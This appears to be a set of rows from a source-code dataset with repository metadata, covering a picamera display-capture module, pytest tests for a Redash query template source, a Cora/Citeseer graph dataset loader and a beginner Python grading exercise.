# DRF: JSON responses only (no browsable API renderer).
REST_FRAMEWORK = {
    'DEFAULT_RENDERER_CLASSES': (
        'rest_framework.renderers.JSONRenderer',
    )
}
| 0 | 0 | 0 |
e90ce6e277dc1dee758c86d3003b819de9af1d2f | 12,772 | py | Python | catkin_ws/src:/opt/ros/kinetic/lib/python2.7/dist-packages/picamera/display.py | johnson880319/Software | 045894227f359e0a3a3ec5b7a53f8d1ebc06acdd | [
"CC-BY-2.0"
] | 1 | 2021-05-30T08:20:37.000Z | 2021-05-30T08:20:37.000Z | catkin_ws/src:/opt/ros/kinetic/lib/python2.7/dist-packages/picamera/display.py | johnson880319/Software | 045894227f359e0a3a3ec5b7a53f8d1ebc06acdd | [
"CC-BY-2.0"
] | null | null | null | catkin_ws/src:/opt/ros/kinetic/lib/python2.7/dist-packages/picamera/display.py | johnson880319/Software | 045894227f359e0a3a3ec5b7a53f8d1ebc06acdd | [
"CC-BY-2.0"
] | null | null | null | # vim: set et sw=4 sts=4 fileencoding=utf-8:
#
# Python camera library for the Rasperry-Pi camera module
# Copyright (c) 2013-2015 Dave Jones <dave@waveform.org.uk>
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of the copyright holder nor the
# names of its contributors may be used to endorse or promote products
# derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
from __future__ import (
unicode_literals,
print_function,
division,
absolute_import,
)
# Make Py2's str equivalent to Py3's: alias `str` to the unicode text type so
# the rest of this module handles text identically on Python 2 and 3.
str = type('')
import mimetypes
import ctypes as ct
from functools import reduce
from operator import or_
from . import bcm_host, mmalobj as mo, mmal
from .encoders import PiCookedOneImageEncoder, PiRawOneImageEncoder
from .exc import PiCameraRuntimeError, PiCameraValueError
| 39.788162 | 104 | 0.633104 | # vim: set et sw=4 sts=4 fileencoding=utf-8:
#
# Python camera library for the Rasperry-Pi camera module
# Copyright (c) 2013-2015 Dave Jones <dave@waveform.org.uk>
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of the copyright holder nor the
# names of its contributors may be used to endorse or promote products
# derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
from __future__ import (
unicode_literals,
print_function,
division,
absolute_import,
)
# Make Py2's str equivalent to Py3's: alias `str` to the unicode text type so
# the rest of this module handles text identically on Python 2 and 3.
str = type('')
import mimetypes
import ctypes as ct
from functools import reduce
from operator import or_
from . import bcm_host, mmalobj as mo, mmal
from .encoders import PiCookedOneImageEncoder, PiRawOneImageEncoder
from .exc import PiCameraRuntimeError, PiCameraValueError
class PiDisplay(object):
    """
    Represents the Raspberry Pi's display, opened through the VideoCore
    dispmanx API (:mod:`bcm_host`), and provides :meth:`capture` to grab a
    snapshot of its current contents. The :attr:`hflip`, :attr:`vflip` and
    :attr:`rotation` properties affect snapshots only, not the display.
    """
    # Fixed attribute set: display handle, mode info struct, snapshot
    # transform bits, and the user-supplied EXIF tag dict.
    __slots__ = (
        '_display',
        '_info',
        '_transform',
        '_exif_tags',
    )
    # Map dispmanx rotation constants to degrees (and the reverse below).
    _ROTATIONS = {
        bcm_host.DISPMANX_NO_ROTATE: 0,
        bcm_host.DISPMANX_ROTATE_90: 90,
        bcm_host.DISPMANX_ROTATE_180: 180,
        bcm_host.DISPMANX_ROTATE_270: 270,
    }
    _ROTATIONS_R = {v: k for k, v in _ROTATIONS.items()}
    # Bitmask covering all rotation bits of a dispmanx transform value.
    _ROTATIONS_MASK = reduce(or_, _ROTATIONS.keys(), 0)
    # Formats captured as raw pixel data (no cooked image encoder).
    RAW_FORMATS = {
        'yuv',
        'rgb',
        'rgba',
        'bgr',
        'bgra',
    }
    def __init__(self, display_num=0):
        """
        Open dispmanx display *display_num* (0 is the default display) and
        query its mode info.

        Raises PiCameraRuntimeError if the display cannot be opened or its
        info cannot be retrieved.
        """
        bcm_host.bcm_host_init()
        self._exif_tags = {}
        self._display = bcm_host.vc_dispmanx_display_open(display_num)
        self._transform = bcm_host.DISPMANX_NO_ROTATE
        if not self._display:
            raise PiCameraRuntimeError('unable to open display %d' % display_num)
        self._info = bcm_host.DISPMANX_MODEINFO_T()
        if bcm_host.vc_dispmanx_display_get_info(self._display, self._info):
            raise PiCameraRuntimeError('unable to get display info')
    def close(self):
        """Release the dispmanx display handle; the object is unusable after."""
        bcm_host.vc_dispmanx_display_close(self._display)
        self._display = None
    @property
    def closed(self):
        """Return True once :meth:`close` has been called."""
        return self._display is None
    def __enter__(self):
        # Context-manager support: ``with PiDisplay() as display: ...``
        return self
    def __exit__(self, exc_type, exc_value, exc_tb):
        self.close()
    def _get_output_format(self, output):
        """
        Given an output object, attempt to determine the requested format.
        We attempt to determine the filename of the *output* object and derive
        a MIME type from the extension. If *output* has no filename, an error
        is raised.
        """
        if isinstance(output, bytes):
            filename = output.decode('utf-8')
        elif isinstance(output, str):
            filename = output
        else:
            # File-like objects expose the underlying filename as .name
            try:
                filename = output.name
            except AttributeError:
                raise PiCameraValueError(
                    'Format must be specified when output has no filename')
        (type, encoding) = mimetypes.guess_type(filename, strict=False)
        if not type:
            raise PiCameraValueError(
                'Unable to determine type from filename %s' % filename)
        return type
    def _get_image_format(self, output, format=None):
        """
        Given an output object and an optional format, attempt to determine the
        requested image format.
        This method is used by all capture methods to determine the requested
        output format. If *format* is specified as a MIME-type the "image/"
        prefix is stripped. If *format* is not specified, then
        :meth:`_get_output_format` will be called to attempt to determine
        format from the *output* object.
        """
        if isinstance(format, bytes):
            format = format.decode('utf-8')
        format = format or self._get_output_format(output)
        format = (
            format[6:] if format.startswith('image/') else
            format)
        if format == 'x-ms-bmp':
            format = 'bmp'
        return format
    def _get_image_encoder(self, output_port, format, resize, **options):
        """
        Construct an image encoder for the requested parameters.
        This method is called by :meth:`capture`. The *output_port* parameter
        gives the MMAL port that the encoder should read output from. The
        *format* parameter indicates the image format and will be one of:
        * ``'jpeg'``
        * ``'png'``
        * ``'gif'``
        * ``'bmp'``
        * ``'yuv'``
        * ``'rgb'``
        * ``'rgba'``
        * ``'bgr'``
        * ``'bgra'``
        The *resize* parameter indicates the size that the encoder should
        resize the output to (presumably by including a resizer in the
        pipeline). Finally, *options* includes extra keyword arguments that
        should be passed verbatim to the encoder.
        """
        encoder_class = (
            PiRawOneImageEncoder if format in self.RAW_FORMATS else
            PiCookedOneImageEncoder)
        return encoder_class(
            self, None, output_port, format, resize, **options)
    def capture(self, output, format=None, resize=None, **options):
        """
        Capture the display's current contents to *output* (a filename or
        file-like object) in *format* (derived from the filename when
        omitted). YUV output is explicitly rejected.
        """
        format = self._get_image_format(output, format)
        if format == 'yuv':
            raise PiCameraValueError('YUV format is unsupported at this time')
        res = self.resolution
        # A 90/270-degree transform (either the display's native one or the
        # user-requested snapshot transform) swaps width and height.
        if (self._info.transform & bcm_host.DISPMANX_ROTATE_90) or (
                self._info.transform & bcm_host.DISPMANX_ROTATE_270):
            res = res.transpose()
        transform = self._transform
        if (transform & bcm_host.DISPMANX_ROTATE_90) or (
                transform & bcm_host.DISPMANX_ROTATE_270):
            res = res.transpose()
        # Feed the snapshot through a Python MMAL source producing RGB
        # (or BGR via the dispmanx red/blue swap flag) into the encoder.
        source = mo.MMALPythonSource()
        source.outputs[0].format = mmal.MMAL_ENCODING_RGB24
        if format == 'bgr':
            source.outputs[0].format = mmal.MMAL_ENCODING_BGR24
            transform |= bcm_host.DISPMANX_SNAPSHOT_SWAP_RED_BLUE
        source.outputs[0].framesize = res
        source.outputs[0].commit()
        encoder = self._get_image_encoder(
            source.outputs[0], format, resize, **options)
        try:
            encoder.start(output)
            try:
                # Rows are padded to a multiple of 16 pixels, 3 bytes/pixel.
                pitch = res.pad(width=16).width * 3
                image_ptr = ct.c_uint32()
                resource = bcm_host.vc_dispmanx_resource_create(
                    bcm_host.VC_IMAGE_RGB888, res.width, res.height, image_ptr)
                if not resource:
                    raise PiCameraRuntimeError(
                        'unable to allocate resource for capture')
                try:
                    buf = source.outputs[0].get_buffer()
                    if bcm_host.vc_dispmanx_snapshot(self._display, resource, transform):
                        raise PiCameraRuntimeError('failed to capture snapshot')
                    rect = bcm_host.VC_RECT_T(0, 0, res.width, res.height)
                    if bcm_host.vc_dispmanx_resource_read_data(resource, rect, buf._buf[0].data, pitch):
                        raise PiCameraRuntimeError('failed to read snapshot')
                    buf._buf[0].length = pitch * res.height
                    # Single-frame capture: mark frame end and end-of-stream.
                    buf._buf[0].flags = (
                        mmal.MMAL_BUFFER_HEADER_FLAG_EOS |
                        mmal.MMAL_BUFFER_HEADER_FLAG_FRAME_END
                    )
                finally:
                    bcm_host.vc_dispmanx_resource_delete(resource)
                source.outputs[0].send_buffer(buf)
                # XXX Anything more intelligent than a 10 second default?
                encoder.wait(10)
            finally:
                encoder.stop()
        finally:
            encoder.close()
    def _calculate_transform(self):
        """
        Calculates a reverse transform to undo any that the boot configuration
        applies (presumably the user has altered the boot configuration to
        match their screen orientation so they want any capture to appear
        correctly oriented by default). This is then modified by the transforms
        specified in the :attr:`rotation`, :attr:`hflip` and :attr:`vflip`
        attributes.
        """
        r = PiDisplay._ROTATIONS[self._info.transform & PiDisplay._ROTATIONS_MASK]
        r = (360 - r) % 360 # undo the native rotation
        r = (r + self.rotation) % 360 # add selected rotation
        result = PiDisplay._ROTATIONS_R[r]
        result |= self._info.transform & ( # undo flips by re-doing them
            bcm_host.DISPMANX_FLIP_HRIZ | bcm_host.DISPMANX_FLIP_VERT
            )
        return result
    @property
    def resolution(self):
        """
        Retrieves the resolution of the display device.
        """
        return mo.PiResolution(width=self._info.width, height=self._info.height)
    def _get_hflip(self):
        return bool(self._info.transform & bcm_host.DISPMANX_FLIP_HRIZ)
    def _set_hflip(self, value):
        if value:
            self._info.transform |= bcm_host.DISPMANX_FLIP_HRIZ
        else:
            self._info.transform &= ~bcm_host.DISPMANX_FLIP_HRIZ
    hflip = property(_get_hflip, _set_hflip, doc="""\
        Retrieves or sets whether snapshots are horizontally flipped.
        When queried, the :attr:`hflip` property returns a boolean indicating
        whether or not the output of :meth:`capture` is horizontally flipped.
        The default is ``False``.
        .. note::
            This property only affects snapshots; it does not affect the
            display output itself.
        """)
    def _get_vflip(self):
        return bool(self._info.transform & bcm_host.DISPMANX_FLIP_VERT)
    def _set_vflip(self, value):
        if value:
            self._info.transform |= bcm_host.DISPMANX_FLIP_VERT
        else:
            self._info.transform &= ~bcm_host.DISPMANX_FLIP_VERT
    vflip = property(_get_vflip, _set_vflip, doc="""\
        Retrieves or sets whether snapshots are vertically flipped.
        When queried, the :attr:`vflip` property returns a boolean indicating
        whether or not the output of :meth:`capture` is vertically flipped. The
        default is ``False``.
        .. note::
            This property only affects snapshots; it does not affect the
            display output itself.
        """)
    def _get_rotation(self):
        return PiDisplay._ROTATIONS[self._transform & PiDisplay._ROTATIONS_MASK]
    def _set_rotation(self, value):
        try:
            self._transform = (
                self._transform & ~PiDisplay._ROTATIONS_MASK) | PiDisplay._ROTATIONS_R[value]
        except KeyError:
            raise PiCameraValueError('invalid rotation %d' % value)
    rotation = property(_get_rotation, _set_rotation, doc="""\
        Retrieves or sets the rotation of snapshots.
        When queried, the :attr:`rotation` property returns the rotation
        applied to the result of :meth:`capture`. Valid values are 0, 90, 180,
        and 270. When set, the property changes the rotation applied to the
        result of :meth:`capture`. The default is 0.
        .. note::
            This property only affects snapshots; it does not affect the
            display itself. To rotate the display itself, modify the
            ``display_rotate`` value in :file:`/boot/config.txt`.
        """)
    def _get_exif_tags(self):
        return self._exif_tags
    def _set_exif_tags(self, value):
        # Assignment takes a shallow copy of the supplied mapping.
        self._exif_tags = {k: v for k, v in value.items()}
    exif_tags = property(_get_exif_tags, _set_exif_tags)
| 4,188 | 6,458 | 23 |
312ace47627ecca7abc37b266c2ad03723ce1d59 | 4,484 | py | Python | tests/stairlight/source/test_redash.py | tosh223/stairlight | a9b01d3453c34bd1af66e8a9c353576f0eeefb5d | [
"MIT"
] | null | null | null | tests/stairlight/source/test_redash.py | tosh223/stairlight | a9b01d3453c34bd1af66e8a9c353576f0eeefb5d | [
"MIT"
] | null | null | null | tests/stairlight/source/test_redash.py | tosh223/stairlight | a9b01d3453c34bd1af66e8a9c353576f0eeefb5d | [
"MIT"
] | null | null | null | import os
from typing import Any, Dict
import pytest
from src.stairlight.config import Configurator
from src.stairlight.key import StairlightConfigKey
from src.stairlight.source.redash import (
RedashTemplate,
RedashTemplateSource,
TemplateSourceType,
)
@pytest.mark.parametrize(
"env_key, path",
[
("REDASH_DATABASE_URL", "src/stairlight/source/sql/redash_queries.sql"),
],
)
@pytest.mark.parametrize(
(
"query_id, query_name, query_str, "
"data_source_name, params, mapped_table_attributes"
),
[
(
5,
"Copy of (#4) New Query",
"SELECT * FROM {{ table }}",
"metadata",
{"table": "dashboards"},
{
"Labels": {"Category": "Redash test"},
"Parameters": {"table": "dashboards"},
"TableName": "Copy of (#4) New Query",
},
),
],
)
| 29.5 | 86 | 0.634701 | import os
from typing import Any, Dict
import pytest
from src.stairlight.config import Configurator
from src.stairlight.key import StairlightConfigKey
from src.stairlight.source.redash import (
RedashTemplate,
RedashTemplateSource,
TemplateSourceType,
)
@pytest.mark.parametrize(
    "env_key, path",
    [
        ("REDASH_DATABASE_URL", "src/stairlight/source/sql/redash_queries.sql"),
    ],
)
class TestRedashTemplateSource:
    """Tests for RedashTemplateSource (query discovery from a Redash DB)."""
    @pytest.fixture(scope="function")
    def redash_template_source(
        self,
        configurator: Configurator,
        mapping_config: Dict[str, Any],
        env_key: str,
        path: str,
    ) -> RedashTemplateSource:
        # Build a template source limited to data source "metadata" and
        # query IDs 1, 3 and 5, with the DB URL taken from env_key.
        stairlight_config = configurator.read(prefix="stairlight_redash")
        source_attributes = {
            StairlightConfigKey.TEMPLATE_SOURCE_TYPE: TemplateSourceType.REDASH.value,
            StairlightConfigKey.Redash.DATABASE_URL_ENV_VAR: env_key,
            StairlightConfigKey.Redash.DATA_SOURCE_NAME: "metadata",
            StairlightConfigKey.Redash.QUERY_IDS: [1, 3, 5],
        }
        return RedashTemplateSource(
            stairlight_config=stairlight_config,
            mapping_config=mapping_config,
            source_attributes=source_attributes,
        )
    def test_build_query_string(
        self,
        redash_template_source: RedashTemplateSource,
        path: str,
    ):
        """The built query is the file's SQL plus the WHERE filter clause."""
        expected = """SELECT
    queries.id,
    queries.name,
    queries.query,
    data_sources.name
FROM
    queries
    INNER JOIN data_sources
        ON queries.data_source_id = data_sources.id
WHERE data_sources.name = :data_source AND queries.id IN :query_ids"""
        actual = redash_template_source.build_query_string(path=path)
        assert actual == expected
    def test_read_query_from_file(
        self,
        redash_template_source: RedashTemplateSource,
        path: str,
    ):
        """Reading the SQL file returns its contents verbatim (no filter)."""
        expected = """SELECT
    queries.id,
    queries.name,
    queries.query,
    data_sources.name
FROM
    queries
    INNER JOIN data_sources
        ON queries.data_source_id = data_sources.id
"""
        actual = redash_template_source.read_query_from_file(path=path)
        assert actual == expected
    def test_get_connection_str(
        self,
        monkeypatch,
        redash_template_source: RedashTemplateSource,
        env_key: str,
    ):
        """The connection string is read from the configured env variable."""
        expected = "postgresql://postgres:testpassword@testhost/postgres"
        envs = {env_key: expected}
        monkeypatch.setattr(os, "environ", envs)
        actual = redash_template_source.get_connection_str()
        assert actual == expected
@pytest.mark.parametrize(
    (
        "query_id, query_name, query_str, "
        "data_source_name, params, mapped_table_attributes"
    ),
    [
        (
            5,
            "Copy of (#4) New Query",
            "SELECT * FROM {{ table }}",
            "metadata",
            {"table": "dashboards"},
            {
                "Labels": {"Category": "Redash test"},
                "Parameters": {"table": "dashboards"},
                "TableName": "Copy of (#4) New Query",
            },
        ),
    ],
)
class TestRedashTemplate:
    """Tests for RedashTemplate (a single Redash query as a template)."""
    @pytest.fixture(scope="function")
    def redash_template(
        self,
        configurator: Configurator,
        query_id: int,
        query_name: str,
        query_str: str,
        data_source_name: str,
        params: Dict[str, Any],
        mapped_table_attributes: Dict[str, Any],
    ) -> RedashTemplate:
        # Build a template from the parametrized query and mapping config.
        mapping_config = configurator.read(prefix="mapping_redash")
        return RedashTemplate(
            mapping_config=mapping_config,
            query_id=query_id,
            query_name=query_name,
            query_str=query_str,
            data_source_name=data_source_name,
        )
    def test_find_mapped_table_attributes(
        self,
        redash_template: RedashTemplate,
        mapped_table_attributes: Dict[str, Any],
    ):
        """The template resolves to the mapped table attributes from config."""
        expected = mapped_table_attributes
        actual = {}
        # Keep the last non-empty attribute set yielded by the generator.
        for attribute in redash_template.find_mapped_table_attributes():
            if attribute:
                actual = attribute
        assert actual == expected
    def test_get_template_str(self, redash_template: RedashTemplate):
        """The raw template string is the Redash query text."""
        assert redash_template.get_template_str() == "SELECT * FROM {{ table }}"
    def test_render(self, redash_template: RedashTemplate, params: Dict[str, Any]):
        """Rendering substitutes parameters into the Jinja placeholders."""
        assert redash_template.render(params=params) == "SELECT * FROM dashboards"
| 3,193 | 304 | 44 |
016bbec27abd5c066c9c544b6cd0e4027d21bf59 | 6,680 | py | Python | data_loaders/citation_networks.py | hcnoh/gcn-pytorch | 2ef4ada8ae60ff4402ee5430def49e441f650e8c | [
"MIT"
] | null | null | null | data_loaders/citation_networks.py | hcnoh/gcn-pytorch | 2ef4ada8ae60ff4402ee5430def49e441f650e8c | [
"MIT"
] | null | null | null | data_loaders/citation_networks.py | hcnoh/gcn-pytorch | 2ef4ada8ae60ff4402ee5430def49e441f650e8c | [
"MIT"
] | null | null | null | import os
import pickle
import numpy as np
import pandas as pd
from torch.utils.data import Dataset
DATASET_DIR = "datasets"
| 31.809524 | 79 | 0.570359 | import os
import pickle
import numpy as np
import pandas as pd
from torch.utils.data import Dataset
DATASET_DIR = "datasets"


class CitationNetworks(Dataset):
    """Base dataset for citation-network node classification (Cora, Citeseer).

    Subclasses set ``dataset_name``, ``directed`` and ``num_features`` and are
    expected to populate ``A``, ``A_hat``, ``X``, ``Y`` etc. from the tuple
    returned by :meth:`preprocess`. The split sizes follow the semi-supervised
    protocol of Yang et al. / Kipf & Welling: 20 labeled nodes per class for
    training and 1000 test nodes.
    """
    def __init__(self, dataset_dir=DATASET_DIR) -> None:
        super().__init__()
        # will be defined in child classes
        self.dataset_name = None
        self.directed = None
        self.num_features = None
        self.dataset_dir = dataset_dir
        self.num_train_samples_per_class = 20
        self.num_test_samples = 1000
    def __getitem__(self, index):
        # X (row-normalized features) and Y (class indices) are assigned by
        # the subclass constructor from the preprocess() result.
        return self.X[index], self.Y[index]
    def __len__(self):
        return self.num_nodes
    def _build_class_indices(self, class_list, labels):
        """Map each class to the list of node indices carrying that label.

        Args:
            class_list: iterable of class identifiers.
            labels: per-node label sequence, aligned with node order.

        Returns:
            dict mapping class -> list of integer node indices of that class.
        """
        return {
            c: [i for i, label in enumerate(labels) if label == c]
            for c in class_list
        }
    def preprocess(self):
        '''
        The preprocess methods are from the following references:
        - http://proceedings.mlr.press/v48/yanga16.pdf
        - https://arxiv.org/pdf/1609.02907.pdf
        '''
        # Edge list: one "To<TAB>From" citation per line.
        cites_path = os.path.join(
            self.dataset_dir, "{}.cites".format(self.dataset_name)
        )
        col_names = ["To", "From"]
        cites_df = pd.read_csv(
            cites_path, sep="\t", names=col_names, header=None
        )
        # Node table: node id, num_features binary word indicators, label.
        content_path = os.path.join(
            self.dataset_dir, "{}.content".format(self.dataset_name)
        )
        col_names = ["Node"] + list(range(self.num_features)) + ["Label"]
        content_df = pd.read_csv(
            content_path, sep="\t", names=col_names, header=None
        )
        content_df["Feature"] = content_df[range(self.num_features)]\
            .agg(list, axis=1)
        content_df = content_df[["Node", "Feature", "Label"]]
        node_list = np.array([str(node) for node in content_df["Node"].values])
        node2idx = {node: idx for idx, node in enumerate(node_list)}
        num_nodes = node_list.shape[0]
        # Row normalization for the feature matrix
        X = np.array(
            [np.array(feature) for feature in content_df["Feature"].values]
        )
        X = X / np.sum(X, axis=-1, keepdims=True)
        num_feature_maps = X.shape[-1]
        class_list = np.unique(content_df["Label"].values)
        class2idx = {c: i for i, c in enumerate(class_list)}
        num_classes = class_list.shape[0]
        Y = np.array(
            [class2idx[c] for c in content_df["Label"].values]
        )
        # Drop citations whose endpoints do not appear in the node table.
        drop_indices = []
        for i, row in cites_df.iterrows():
            if str(row["To"]) not in node_list or \
                    str(row["From"]) not in node_list:
                drop_indices.append(i)
        cites_df = cites_df.drop(drop_indices)
        A = np.zeros([num_nodes, num_nodes])
        for _, row in cites_df.iterrows():
            to_ = str(row["To"])
            from_ = str(row["From"])
            A[node2idx[to_], node2idx[from_]] = 1
            if not self.directed:
                A[node2idx[from_], node2idx[to_]] = 1
        # Self Connection
        A_tilde = np.copy(A)
        for i in range(A_tilde.shape[0]):
            A_tilde[i, i] = 1
        # Renormalization Trick: A_hat = D^-1/2 (A + I) D^-1/2
        D_tilde = np.sum(A_tilde, axis=-1)
        A_hat = np.matmul(
            np.diag(D_tilde ** (-0.5)),
            np.matmul(A_tilde, np.diag(D_tilde ** (-0.5)))
        )
        # Bug fix: the original loop appended *every* node index to *every*
        # class, which broke the per-class stratified sampling below. Filter
        # node indices by their label instead.
        class2indices = self._build_class_indices(
            class_list, content_df["Label"].values
        )
        # NOTE(review): np.random.choice samples *with* replacement here, so
        # the train split may contain duplicates — confirm whether
        # replace=False (20 distinct nodes per class) is intended.
        train_indices = np.hstack(
            [
                np.random.choice(v, self.num_train_samples_per_class)
                for _, v in class2indices.items()
            ]
        )
        test_indices = np.delete(np.arange(num_nodes), train_indices)
        test_indices = np.random.choice(test_indices, self.num_test_samples)
        return A, A_hat, X, Y, node_list, node2idx, num_nodes, \
            num_feature_maps, class_list, class2idx, num_classes, \
            class2indices, train_indices, test_indices
class Citeseer(CitationNetworks):
    """Citeseer citation network (3703-dimensional bag-of-words features).

    Loads a cached preprocessed dataset from
    ``datasets/citeseer/{directed|undirected}/dataset.pkl`` when present;
    otherwise runs :meth:`CitationNetworks.preprocess` and caches the result.
    """
    def __init__(self, directed) -> None:
        super().__init__()
        self.directed = directed
        self.num_features = 3703
        self.dataset_name = "citeseer"
        self.dataset_dir = os.path.join(self.dataset_dir, self.dataset_name)
        # Cache directory depends on whether the graph is treated as directed.
        if self.directed:
            self.preprocessed_dir = os.path.join(
                self.dataset_dir, "directed"
            )
        else:
            self.preprocessed_dir = os.path.join(
                self.dataset_dir, "undirected"
            )
        # (Removed a leftover debug print of preprocessed_dir that the
        # otherwise-identical Cora constructor never had.)
        if not os.path.exists(self.preprocessed_dir):
            os.mkdir(self.preprocessed_dir)
        # Load the pickled preprocessing result if available; otherwise
        # preprocess the raw .cites/.content files and cache the tuple.
        if os.path.exists(os.path.join(self.preprocessed_dir, "dataset.pkl")):
            with open(
                os.path.join(self.preprocessed_dir, "dataset.pkl"), "rb"
            ) as f:
                dataset = pickle.load(f)
        else:
            dataset = self.preprocess()
            with open(
                os.path.join(self.preprocessed_dir, "dataset.pkl"), "wb"
            ) as f:
                pickle.dump(dataset, f)
        self.A, self.A_hat, self.X, self.Y, self.node_list, self.node2idx, \
            self.num_nodes, self.num_feature_maps, self.class_list, \
            self.class2idx, self.num_classes, self.class2indices, \
            self.train_indices, self.test_indices = dataset
class Cora(CitationNetworks):
    """Cora citation network (1433-dimensional bag-of-words features).

    Loads a cached preprocessed dataset from
    ``datasets/cora/{directed|undirected}/dataset.pkl`` when present;
    otherwise runs :meth:`CitationNetworks.preprocess` and caches the result.
    """
    def __init__(self, directed) -> None:
        super().__init__()
        self.directed = directed
        self.num_features = 1433
        self.dataset_name = "cora"
        self.dataset_dir = os.path.join(self.dataset_dir, self.dataset_name)
        # Cache directory depends on whether the graph is treated as directed.
        subdir = "directed" if self.directed else "undirected"
        self.preprocessed_dir = os.path.join(self.dataset_dir, subdir)
        if not os.path.exists(self.preprocessed_dir):
            os.mkdir(self.preprocessed_dir)
        # Reuse the pickled preprocessing result when available; otherwise
        # preprocess the raw files and cache the tuple for next time.
        cache_path = os.path.join(self.preprocessed_dir, "dataset.pkl")
        if os.path.exists(cache_path):
            with open(cache_path, "rb") as f:
                dataset = pickle.load(f)
        else:
            dataset = self.preprocess()
            with open(cache_path, "wb") as f:
                pickle.dump(dataset, f)
        (self.A, self.A_hat, self.X, self.Y, self.node_list, self.node2idx,
         self.num_nodes, self.num_feature_maps, self.class_list,
         self.class2idx, self.num_classes, self.class2indices,
         self.train_indices, self.test_indices) = dataset
| 3,053 | 3,374 | 121 |
4763556f9202f9225d54195f6543fae5e3581e1f | 573 | py | Python | Course 01 - Getting Started with Python/Extra Studies/Conditionals/ex013.py | marcoshsq/python_practical_exercises | 77136cd4bc0f34acde3380ffdc5af74f7a960670 | [
"MIT"
] | 9 | 2022-03-22T16:45:17.000Z | 2022-03-25T20:22:35.000Z | Course 01 - Getting Started with Python/Extra Studies/Conditionals/ex013.py | marcoshsq/python_practical_exercises | 77136cd4bc0f34acde3380ffdc5af74f7a960670 | [
"MIT"
] | null | null | null | Course 01 - Getting Started with Python/Extra Studies/Conditionals/ex013.py | marcoshsq/python_practical_exercises | 77136cd4bc0f34acde3380ffdc5af74f7a960670 | [
"MIT"
] | 3 | 2022-03-22T17:03:38.000Z | 2022-03-29T17:20:55.000Z | # Exercise 013 - That Classic Average
"""Create a program that reads two grades from a student and calculates their average, showing a message at the end, according to the average achieved:
- Average below 5.0: FAIL"""
grade_01 = float(input("Enter the first grade: "))
grade_02 = float(input("Enter the second grade: "))
average = (grade_01 + grade_02) / 2
if 5 <= average <= 10:
print(f"The student took {average} of note, was approved! ")
elif 0 <= average < 5:
print(f"The student took {average} of note, was disapproved! ")
else:
print("Wrong value")
| 31.833333 | 151 | 0.69808 | # Exercise 013 - That Classic Average
"""Create a program that reads two grades from a student and calculates their average, showing a message at the end, according to the average achieved:
- Average below 5.0: FAIL"""

# Read both grades and take their arithmetic mean.
first_grade = float(input("Enter the first grade: "))
second_grade = float(input("Enter the second grade: "))
mean = (first_grade + second_grade) / 2

# Classify: [0, 5) fails, [5, 10] passes; anything outside 0-10 is invalid.
if 0 <= mean < 5:
    print(f"The student took {mean} of note, was disapproved! ")
elif 5 <= mean <= 10:
    print(f"The student took {mean} of note, was approved! ")
else:
    print("Wrong value")
| 0 | 0 | 0 |
ab02a7d8eba9cd4cd4bb02af22d39257d4337a1f | 4,549 | py | Python | Solutions/CrowdStrike Falcon Endpoint Protection/DataConnectors/CrowdstrikeReplicator/CrowdstrikeFalconAPISentinelConnector/sentinel_connector_async.py | relion365/Azure-Sentinel | a13083269ff046928062c9f565db5797e867282b | [
"MIT"
] | 11 | 2019-02-04T13:37:14.000Z | 2019-02-22T20:47:06.000Z | Solutions/CrowdStrike Falcon Endpoint Protection/DataConnectors/CrowdstrikeReplicator/CrowdstrikeFalconAPISentinelConnector/sentinel_connector_async.py | relion365/Azure-Sentinel | a13083269ff046928062c9f565db5797e867282b | [
"MIT"
] | 6 | 2019-02-03T13:58:50.000Z | 2019-02-25T02:01:16.000Z | Solutions/CrowdStrike Falcon Endpoint Protection/DataConnectors/CrowdstrikeReplicator/CrowdstrikeFalconAPISentinelConnector/sentinel_connector_async.py | relion365/Azure-Sentinel | a13083269ff046928062c9f565db5797e867282b | [
"MIT"
